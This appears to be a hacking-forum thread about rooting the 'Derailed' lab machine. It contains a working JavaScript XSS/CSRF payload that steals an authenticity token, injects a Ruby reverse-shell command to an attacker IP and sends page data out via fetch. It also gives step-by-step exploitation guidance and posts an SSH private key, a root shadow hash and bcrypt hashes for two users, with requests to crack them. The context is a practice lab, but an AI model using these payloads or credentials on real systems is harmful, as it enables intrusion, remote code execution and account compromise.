Now I'm stuck in XSS

I create report in clipboard

```
function getMiddleText(content,leftStr,rightStr){
    var startIndex = content.indexOf(leftStr)+leftStr.length;
    var endIndex = content.indexOf(rightStr);
    return content.substr(startIndex,endIndex-startIndex);
}
fetch(`http://derailed.htb:3000/administration`)
.then((rep)=>{return rep.text()})
.then((content)=>{
    let token = getMiddleText(content,`authenticity_token" value="`,`" autocomplete=`);
    fetch("http://derailed.htb:3000/administration/reports", {
      "headers": {
        "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "content-type": "application/x-www-form-urlencoded",
      },
      "referrer": "http://derailed.htb:3000/administration",
      "referrerPolicy": "strict-origin-when-cross-origin",
      "body": `authenticity_token=${token}&report_log=|ruby+-rsocket+-e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("10.10.XX.XX",4444))'`,
      "method": "POST",
      "mode": "cors",
    }).then((rep=>{
        return rep.text();
    })).then((text)=>{
        fetch("http://10.10.XX.XX/data/"+btoa(text));
    });
})
```
however I didn't get some response to netcat and simple http server in port 80...

you have to create a user exampleuseruseruseruseruseruseruseruseruseruseruserObfuscated the payload and put in obfuscated-char-code.i receive call back but not the token. i will try this XSS you post here.[url=http://www.mauvecloud.net/charsets/CharCodeFinder.html]Character Code Finder (mauvecloud.net)[/url]

[quote="yumi" pid="863200" dateline="1669542663"]you have to create a user exampleuseruseruseruseruseruseruseruseruseruseruserObfuscated the payload and put in obfuscated-char-code.i receive call back but not the token. i will try this XSS you post here.[url=http://www.mauvecloud.net/charsets/CharCodeFinder.html]Character Code Finder (mauvecloud.net)[/url][/quote]Ahh I misunderstood... Thank You!!!!!

(November 23, 2022, 11:57 PM)meowmeowattack Wrote: regarding the intended foothold with xss

* Overview of the attack concept
    * This challenge is very similar to `rootme\web-client\CSRF-token-bypass`, so if you would like to have more challenge after this, you will learn a lot by visiting the same challenge on rootme.
    * We need to first find a specific sequence to bypass the sanitization and  execute arbitrary code, e.g `xss`
    * Then, we need to use the xss to map out what's the administration page like
    * After that, we need to craft a `csrf` payload to do two things 1) fetch an `authenticity_token` from the `/administration` page, 2) craft a form that posts to `/administration/reports` with the `authenticity_token` we obtained earlier.

* To trigger the payload, following is the rough structure
    * Register a user by intercepting the traffic to bypass character limit
    * Craft the user name with a specific pattern to bypass sanitization
    * Login as the new user
    * Create a clipnote with random content
    * Once the note is created, you should be able to see your xss being executed
    * Report this note and wait for the admin to visit the note (note, sometimes the admin visit process may be broken, if you are certain that your payload should work but didn't see anything within 2 minutes, tough luck, reset and restart. i think this part is not stable)

im trying here, but a have a problem with authenticity_token i didint receive a shell wee have to make XSS trigger user post the  authenticity_token in report ?

[quote="Himitsu" pid="861512" dateline="1669511491"][quote="undeadly" pid="858543" dateline="1669464382"]author of this box is a great hacker himself and he learnt a lesson to stop publishing id_rsa keys for accounts.at least for insane and hard levels. you have to work your way through, thankfully...[/quote]Yes and No.Yes after applied multiple patches then the root's private key has been removed.No from the beginning, we could retrieved the root's private key:[quote]┌──(user㉿kali)-[~/.msf4/loot]└─$ cat 20221120220230_default_127.0.0.1_chrome.debugger._239600.txt

-----BEGIN OPENSSH PRIVATE KEY-----b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAACFwAAAAdzc2gtcnNhAAAAAwEAAQAAAgEAmjRgHVVrgXbautwf8XHRpVYn8EVLYYZLx6AtCtYh3Gp2dba8/eOB5Plf/dIju5h2yNSOLe1EMjrRJoF/nnWraqEx3m9MMDEDNnIkmPrt0AL1NVipHOCSBmBuFozdCuQ4ug+ATwme+GVE4jnoXBBBn/ZvmHk5nc0lsG2wUbRSF9JTX7ogqJxYlhD6cgSiMwxTiKKCKGpzn60IhYtLjm7SoFFtqAnr1tONnO+IskNhifV4LZFW2lE9XX+4uC/9zJhGEIxzEufs1mD0KUBRlUcrP8+e0KWSl3eOs+HcZ3pTA0E4+/C9axK6Cm7sKijXkpCqif/Es6A04nPTg2xQdBnPvW9XvocfwA1Z52/vHeXJGc/EqknnFy5PV8vxY1ClC3pRKIWRNm9w35VoF2pkfOsphhdGU1wa2/AAAAE3Jvb3RAb3Blbm1lZGlhdmF1bHQBAgMEBQYH-----END OPENSSH PRIVATE KEY-----

[/quote][/quote]i tried this box after all patches was already applied. didn't get a chance earlier. i've been pretty busy with more important stuff these days..after rooting this nice box i didn't found any keys neither on root nor even on marcus' folder. nice job from the author.btw, i was unsuccessful with chrome driver vuln. probably also patched.[code]root@derailed:~# iduid=0(root) gid=0(root) groups=0(root)root@derailed:~# ls -latotal 76drwx------ 13 root root 4096 Nov 25 08:41 .drwxr-xr-x 19 root root 4096 Nov 14 04:56 ..lrwxrwxrwx 1 root root 9 May 30 15:55 .bash_history -> /dev/null-rw------- 1 root root 858 Apr 26 2022 .bashrcdrwxr-xr-x 3 root root 4096 Nov 4 08:00 .bundledrwxr-xr-x 3 root root 4096 Nov 4 08:00 .cachedrwx------ 5 root root 4096 Nov 4 08:00 .configdrwxrwxr-x 3 root root 4096 Nov 4 08:00 .gemdrwx------ 2 root root 4096 Nov 4 08:00 .gnupgdrwxr-xr-x 3 root root 4096 Nov 4 08:00 google-rw------- 1 root root 278 Apr 26 2022 .inputrcdrwxr-xr-x 3 root root 4096 Nov 4 08:00 .localdrwx------ 2 root root 4096 Nov 20 12:46 metadrwxr-xr-x 4 root root 4096 Nov 4 08:00 .npmdrwx------ 3 root root 4096 Nov 4 08:00 .pki-rw-r--r-- 1 root root 174 Apr 26 2022 .profilelrwxrwxrwx 1 root root 9 May 29 17:30 .python_history -> /dev/null-rw-r----- 1 root root 33 Nov 25 04:02 root.txt-rw-r--r-- 1 root root 74 Nov 4 05:01 .selected_editorlrwxrwxrwx 1 root root 9 May 29 17:30 .sqlite_history -> /dev/nulldrwx------ 2 root root 4096 Nov 20 16:51 .sshlrwxrwxrwx 1 root root 9 May 29 17:32 .wget-hsts -> /dev/null-rwxr-xr-x 1 root root 2336 Nov 25 08:41 xss.pyroot@derailed:~#root@derailed:~# grep root /etc/shadowroot:$y$j9T$4H76C3VvReuiPfwg2kJ8T/$UAFsX2oGNBaoh.0/aNhrf4:19142:0:99999:7:::[/code][hr][quote="yumi" pid="863346" dateline="1669544968"][quote="meowmeowattack" pid="848953" dateline="1669247827"]regarding the intended foothold with xss* Overview of the attack concept * This challenge is very similar to `rootme\web-client\CSRF-token-bypass`, so if you would like to have more challenge after this, you will learn a lot by visiting the same challenge on rootme. * We need to first find a specific sequence to bypass the sanitization and execute arbitrary code, e.g `xss` * Then, we need to use the xss to map out what's the administration page like * After that, we need to craft a `csrf` payload to do two things 1) fetch an `authenticity_token` from the `/administration` page, 2) craft a form that posts to `/administration/reports` with the `authenticity_token` we obtained earlier.* To trigger the payload, following is the rough structure * Register a user by intercepting the traffic to bypass character limit * Craft the user name with a specific pattern to bypass sanitization * Login as the new user * Create a clipnote with random content * Once the note is created, you should be able to see your xss being executed * Report this note and wait for the admin to visit the note (note, sometimes the admin visit process may be broken, if you are certain that your payload should work but didn't see anything within 2 minutes, tough luck, reset and restart. i think this part is not stable)[/quote]im trying here, but a have a problem with authenticity_token i didint receive a shell wee have to make XSS trigger user post the authenticity_token in report ?[/quote]authenticity_token is required to access -- http://derailed.htb:3000/administration/reportsotherwise, access forbidden. then you got rce through this report end-point, yesif you're certain everything should work -- try resetting the box. multiple folks on the box may brake stuff

Thanks, get the user flag, on path to root now, thanks

rooted thanks guys

(November 27, 2022, 10:49 PM)yumi Wrote: rooted thanks guys

congratulations!
i'm trying with http://derailed.htb:3000/administration/reports but i still receive "You must be an admin to access this section" ,did you use the same trick to get administrator account?

(November 27, 2022, 11:48 PM)_eminem_ Wrote:

(November 27, 2022, 10:49 PM)yumi Wrote: rooted thanks guys

congratulations!
i'm trying with http://derailed.htb:3000/administration/reports but i still receive "You must be an admin to access this section" ,did you use the same trick to get administrator account?

yes, get shell as rails

(November 26, 2022, 02:48 AM)deer Wrote:

(November 25, 2022, 09:12 AM)j3i_hero Wrote: could anyone send alice and toby hashes in

var/www/rails-app/db/development.sqlite3

Alice $2a$12$hkqXQw6n0CxwBxEW/0obHOb.0/Grwie/4z95W3BhoFqpQRKIAxI7.

Toby $2a$12$AD54WZ4XBxPbNW/5gWUIKu0Hpv9UKN5RML3sDLuIqNqqimqnZYyle

thanks bro.
could u please send alice and toby password i tried but I could not crack them